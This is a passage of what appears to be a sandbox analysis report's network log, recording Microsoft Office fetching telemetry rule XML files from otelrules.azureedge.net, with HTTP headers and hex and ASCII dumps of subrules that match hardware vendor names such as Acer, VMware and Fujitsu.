                          24192.168.2.44977513.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:33 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:33 UTC471INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:33 GMT
                          Content-Type: text/xml
                          Content-Length: 486
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                          ETag: "0x8DC582B9018290B"
                          x-ms-request-id: 88bcded8-c01e-007a-565a-3fb877000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165633Z-178bfbc474bq2pr7hC1NYCkfgg00000007sg00000000t77z
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_MISS
                          Accept-Ranges: bytes
                          2024-11-25 16:56:33 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          25192.168.2.44977613.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:33 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:33 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:33 GMT
                          Content-Type: text/xml
                          Content-Length: 407
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                          ETag: "0x8DC582B9698189B"
                          x-ms-request-id: a69f297f-901e-002a-244c-3c7a27000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165633Z-15b8b599d88s6mj9hC1TEBur30000000061g00000000b7rk
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:33 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                          Session IDSource IPSource PortDestination IPDestination Port
                          26192.168.2.44977813.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:35 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:35 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:35 GMT
                          Content-Type: text/xml
                          Content-Length: 469
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                          ETag: "0x8DC582BBA701121"
                          x-ms-request-id: ce6e3a8c-101e-0017-74b5-3e47c7000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165635Z-178bfbc474bbbqrhhC1NYCvw7400000007t000000000u695
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:35 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          27192.168.2.44977913.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:35 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:35 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:35 GMT
                          Content-Type: text/xml
                          Content-Length: 415
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                          ETag: "0x8DC582BA41997E3"
                          x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165635Z-174c587ffdfcb7qhhC1TEB3x7000000006a000000000ah28
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:35 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                          Session IDSource IPSource PortDestination IPDestination Port
                          28192.168.2.44978013.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:35 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:36 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:35 GMT
                          Content-Type: text/xml
                          Content-Length: 477
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                          ETag: "0x8DC582BB8CEAC16"
                          x-ms-request-id: 4834b854-301e-005d-3ab8-3ee448000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165635Z-178bfbc474bwlrhlhC1NYCy3kg00000007r000000000g7cf
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:36 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          29192.168.2.44978113.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:35 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:36 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:35 GMT
                          Content-Type: text/xml
                          Content-Length: 464
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                          ETag: "0x8DC582B97FB6C3C"
                          x-ms-request-id: 9ffa30f7-401e-000a-3a5c-3d4a7b000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165635Z-174c587ffdfp4vpjhC1TEBybqw000000064g00000000rms3
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:36 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                          Session IDSource IPSource PortDestination IPDestination Port
                          30192.168.2.44978213.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:35 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:36 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:35 GMT
                          Content-Type: text/xml
                          Content-Length: 494
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                          ETag: "0x8DC582BB7010D66"
                          x-ms-request-id: 44e9982d-301e-001f-6639-3caa3a000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165635Z-15b8b599d88hr8sfhC1TEBbca4000000064g000000007q2k
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:36 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          31192.168.2.44978313.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:37 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:38 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:37 GMT
                          Content-Type: text/xml
                          Content-Length: 419
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                          ETag: "0x8DC582B9748630E"
                          x-ms-request-id: ca5e5154-001e-0014-4e4e-3c5151000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165637Z-15b8b599d88tmlzshC1TEB4xpn000000060000000000txbz
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:38 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                          Session IDSource IPSource PortDestination IPDestination Port
                          32192.168.2.44978413.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:37 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:38 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:38 GMT
                          Content-Type: text/xml
                          Content-Length: 472
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                          ETag: "0x8DC582B9DACDF62"
                          x-ms-request-id: 2b92647c-c01e-00a2-646f-3b2327000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165638Z-174c587ffdf7t49mhC1TEB4qbg000000065000000000az8w
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:38 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          33192.168.2.44978613.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:38 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:38 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:38 GMT
                          Content-Type: text/xml
                          Content-Length: 468
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                          ETag: "0x8DC582B9C8E04C8"
                          x-ms-request-id: 6ea5360a-801e-002a-4904-3e31dc000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165638Z-178bfbc474bwh9gmhC1NYCy3rs00000007qg00000000udc0
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:38 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          34192.168.2.44978513.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:38 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:38 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:38 GMT
                          Content-Type: text/xml
                          Content-Length: 404
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                          ETag: "0x8DC582B9E8EE0F3"
                          x-ms-request-id: f19b5380-801e-0015-2749-3cf97f000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165638Z-15b8b599d885ffrhhC1TEBtuv0000000067g00000000hzys
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:38 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                          Session IDSource IPSource PortDestination IPDestination Port
                          35192.168.2.44978713.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:38 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:38 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:38 GMT
                          Content-Type: text/xml
                          Content-Length: 428
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                          ETag: "0x8DC582BAC4F34CA"
                          x-ms-request-id: 57389be4-e01e-0003-606c-3c0fa8000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165638Z-174c587ffdfcb7qhhC1TEB3x70000000068g00000000gm2y
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
